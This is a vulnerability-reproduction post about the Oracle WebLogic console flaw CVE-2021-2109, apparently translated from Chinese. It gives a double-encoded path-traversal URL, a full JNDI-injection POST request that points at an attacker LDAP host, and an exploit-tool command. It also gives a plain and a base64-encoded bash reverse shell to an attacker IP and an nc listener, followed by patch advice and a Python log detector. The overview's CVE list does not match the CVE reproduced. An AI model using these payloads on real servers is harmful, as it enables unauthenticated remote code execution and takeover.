Category: Vulnerability Reproduction
0x01 Overview
On 20 January 2021, NSFOCUS observed that Oracle had released its January 2021 Critical Patch Update (CPU) advisory, which fixes 329 vulnerabilities of varying severity, including 7 critical vulnerabilities affecting WebLogic (CVE-2021-1994, CVE-2021-2047, CVE-2021-2064, CVE-2021-2108, CVE-2021-2075, CVE-2019-17195, CVE-2020-14756). An unauthenticated attacker can exploit these vulnerabilities to achieve remote code execution. All of them carry a CVSS score of 9.8 and have low attack complexity. Users are advised to take protective measures against these vulnerabilities as soon as possible.
0x02 CVE ID
CVE-2021-2109
0x03 Affected Versions
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
0x04 Vulnerability Reproduction
Unauthenticated access URL:
http://ip:7001/console/css/%252e%252e%252f/consolejndi.portal
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A vps -C "touch /tmp/shelli"
PoC
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/cqubba;AdminServer%22)
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://81.70.146;55:1389/cqubba;AdminServer%22) HTTP/1.1
Host: ip:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

The command executes successfully.
Reverse shell
bash
/bin/bash -i >& /dev/tcp/vps/55555 0>&1
Base64 encoding: http://www.jackson-t.ca/runtime-exec-payloads.html
bash -c {echo,L2Jpbi9iYXNoIC1pID4mICAvZGV2L3RjcC84MS43MC4xNDYuNTUvNTU1NTUgMD4mMQ==}|{base64,-d}|{bash,-i}
Start a listener
nc -lnvp 9999
PoC
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xx.xx.xx;xx:1389/3pgd15;AdminServer%22)
0x05 Tools
https://github.com/welk1n/JNDI-Injection-Exploit
0x06 Remediation
Apply the latest patch; refer to the patches published on Oracle's website: https://www.oracle.com/security-alerts/cpujan2021.html
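Alongside patching, the request shape shown in the PoC above is easy to spot in access logs. The following Python checker is an added example (not code from the original post or from the JNDI-Injection-Exploit project): it repeatedly URL-decodes the request target so that %252e%252e becomes .., flags traversal out of the unauthenticated /console/css/ path, and flags a JndiBindingHandle argument that carries a remote ldap/rmi/iiop URL. The sample request lines and the 203.0.113.10 address are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (not a real capture). The third one
# mirrors the request shape shown in the post; 203.0.113.10 is a
# documentation address, not a real listener.
SAMPLE_REQUESTS = [
    "GET /console/login/LoginForm.jsp HTTP/1.1",
    "GET /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral HTTP/1.1",
    "POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true"
    "&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle"
    "(%22ldap://203.0.113;10:1389/cqubba;AdminServer%22) HTTP/1.1",
    "GET /console/css/style.css HTTP/1.1",
]

# A JndiBindingHandle whose argument points at a remote naming service.
JNDI_REMOTE = re.compile(r"JndiBindingHandle\([^)]*\b(?:ldaps?|rmi|iiop)://", re.IGNORECASE)


def fully_decode(target, max_rounds=3):
    """Undo repeated URL encoding: %252e%252e -> %2e%2e -> .. (stops once stable)."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def analyze_request(request_line):
    """Return the indicator names found in one HTTP request line, in a fixed order."""
    parts = request_line.split(" ")
    target = parts[1] if len(parts) >= 2 else request_line
    decoded = fully_decode(target)
    findings = []
    # Traversal out of the unauthenticated /console/css/ static path.
    if "/console/css/../" in decoded.lower():
        findings.append("console-path-traversal")
    # Handle parameter carrying an attacker-controlled JNDI URL.
    if JNDI_REMOTE.search(decoded):
        findings.append("jndi-handle-remote-url")
    return findings


def scan(request_lines):
    """Return (index, findings) for every request line with at least one indicator."""
    return [(i, f) for i, line in enumerate(request_lines) if (f := analyze_request(line))]


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_REQUESTS):
        print(f"line {idx}: {', '.join(findings)}")
```

A request that shows both indicators together is a strong signal of an attempt against the console's JNDI binding page; traversal alone still merits a look, since /console/css/ should never be followed by "..".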